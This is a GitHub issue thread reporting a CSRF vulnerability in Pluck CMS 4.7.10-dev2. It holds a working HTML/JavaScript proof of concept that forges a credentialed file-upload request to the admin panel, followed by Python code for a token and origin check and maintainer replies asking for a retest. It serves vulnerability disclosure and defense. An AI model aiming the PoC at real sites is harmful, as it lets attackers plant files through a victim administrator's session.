
There is a CSRF vulnerability can add txt file. #82

Closed
Lilc1 opened this issue Oct 21, 2019 · 3 comments

Lilc1 commented Oct 21, 2019

This problem was found in Pluck v4.7.10-dev2. This CSRF vulnerability can add a txt file via /admin.php?action=abc.
PoC:

```html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/172.16.1.234\/pluck\/admin.php?action=files", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------18467633426500");
        xhr.withCredentials = true;
        var body = "-----------------------------18467633426500\r\n" + 
          "Content-Disposition: form-data; name=\"filefile\"; filename=\"1.txt\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "hacker\r\n" + 
          "-----------------------------18467633426500\r\n" + 
          "Content-Disposition: form-data; name=\"submit\"\r\n" + 
          "\r\n" + 
          "Upload\r\n" + 
          "-----------------------------18467633426500--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
```

Verification (screenshots omitted)
The uploaded file is stored in the /files/ directory.
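The PoC works because the victim's browser attaches the Pluck session cookie to a cross-origin multipart POST, and the upload handler accepts any request that carries a valid cookie. The following is an added example, not Pluck's code, of the server-side check a handler for admin.php?action=files would need: a per-session anti-CSRF token plus a same-site check on browser-set request metadata. It is written in Python as a constructed stand-in for the PHP handler; SITE_ORIGIN, the session dict, the header set and the csrf_token form field are assumptions.

```python
import hmac
import secrets
from typing import Mapping, Tuple

# Origin the admin UI is served from (taken from the PoC's URL). Everything
# else here is a constructed stand-in for a request handler, not Pluck's code.
SITE_ORIGIN = "http://172.16.1.234"

def issue_csrf_token(session: dict) -> str:
    """Mint a per-session anti-CSRF token; the reference copy stays server-side."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def is_cross_site(headers: Mapping[str, str]) -> bool:
    """Browser-set metadata: prefer Sec-Fetch-Site, else Origin. A cross-origin
    XHR such as the PoC carries the attacker page's Origin, which its script
    cannot alter; with neither header present, fall through to the token check."""
    sfs = headers.get("Sec-Fetch-Site")
    if sfs is not None:
        return sfs not in ("same-origin", "none")
    origin = headers.get("Origin")
    return origin is not None and origin != SITE_ORIGIN

def authorize_upload(session: dict, headers: Mapping[str, str],
                     form: Mapping[str, str]) -> Tuple[bool, str]:
    """Decide whether action=files may store the upload. A valid login cookie is
    necessary but not sufficient: the PoC works precisely because the browser
    attaches it automatically, so the request must also prove same-site origin."""
    if not session.get("logged_in"):
        return False, "not logged in"
    if is_cross_site(headers):
        return False, "cross-site request rejected"
    expected, supplied = session.get("csrf_token"), form.get("csrf_token")
    if not expected or not supplied or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"

def demo() -> dict:
    """Constructed requests: the PoC's shape versus a legitimate admin upload."""
    session = {"logged_in": True}
    token = issue_csrf_token(session)
    poc = ({"Origin": "http://attacker.example", "Sec-Fetch-Site": "cross-site"},
           {"filefile": "1.txt", "submit": "Upload"})       # no token, as in the PoC
    legit = ({"Origin": SITE_ORIGIN, "Sec-Fetch-Site": "same-origin"},
             {"filefile": "1.txt", "submit": "Upload", "csrf_token": token})
    return {"poc": authorize_upload(session, *poc),
            "legit": authorize_upload(session, *legit),
            "legit_bad_token": authorize_upload(session, legit[0],
                                                {**legit[1], "csrf_token": "x" * 43})}
```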

BSteelooper (Contributor) commented:

You have to first be logged in to pluck. This is not possible when you are not logged in. When you know the password you can simply browse the file upload page.

@BSteelooper BSteelooper reopened this Oct 21, 2019
BSteelooper pushed a commit that referenced this issue Oct 21, 2019
BSteelooper (Contributor) commented:

Could you please test the latest dev release 4.7.10-dev4?
https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4

BSteelooper (Contributor) commented:

Have you retested with the latest dev version?
